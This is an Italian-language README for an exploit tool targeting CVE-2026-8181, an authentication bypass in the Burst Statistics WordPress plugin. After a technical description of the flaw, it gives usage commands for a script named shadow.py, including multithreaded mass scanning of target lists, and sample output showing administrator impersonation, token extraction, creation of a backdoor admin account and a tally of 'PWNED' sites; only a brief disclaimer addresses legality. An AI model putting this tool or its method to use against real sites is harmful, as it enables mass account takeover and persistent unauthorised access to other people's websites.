
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Bypass dell'autenticazione per l'acquisizione dell'account amministratore
Burst Statistics | Bypass dell'autenticazione per il takeover dell'account amministratore
Burst Statistics 3.4.0 - 3.4.1.1 - Bypass dell'autenticazione per il takeover dell'account amministratore
Il plugin Burst Statistics – Privacy-Friendly WordPress Analytics (Alternative a Google Analytics) per WordPress è vulnerabile a un bypass dell'autenticazione nelle versioni 3.4.0 fino a 3.4.1.1. Ciò è dovuto a una gestione errata del valore di ritorno nella funzione is_mainwp_authenticated() durante la convalida delle password delle applicazioni provenienti dall'intestazione Authorization. La funzione chiama wp_authenticate_application_password(null, $username, $password) che restituisce null (non WP_Error) quando l'utente target non ha password di applicazione configurate. Poiché il codice controlla solo is_wp_error(), procede a chiamare wp_set_current_user() — concedendo quindi pieni privilegi di amministratore all'attaccante per l'intera richiesta.
Il bypass viene attivato durante plugins_loaded (priorità 9) tramite has_admin_access() nel bootstrap del plugin, il che significa che l'impersonificazione dell'utente avviene prima che il REST API di WordPress distribuisca qualsiasi percorso — consentendo l'accesso a tutti gli endpoint core di WP (/wp/v2/users, /wp/v2/users/me, ecc.) come amministratore.
Ciò rende possibile per attaccanti non autenticati, con la conoscenza del nome utente di un amministratore, impersonare quell'amministratore fornendo una password Basic Authentication casuale, ottenendo una escalation completa dei privilegi e il takeover dell'account amministratore.
~ Punteggio CVSS: 9.8 (Critico)
~ Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ Versioni interessate: 3.4.0 - 3.4.1.1
~ Versione corretta: 3.4.2
Singolo target:
python3 shadow.py -u https://target.comSingolo target con nome utente noto:
python3 shadow.py -u https://target.com -U adminTarget multipli:
python3 shadow.py -f targets.txt -t 20Modalità interattiva:
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
L'uso non autorizzato di sistemi di cui non si è proprietari o per cui non si dispone dell'autorizzazione è illegale.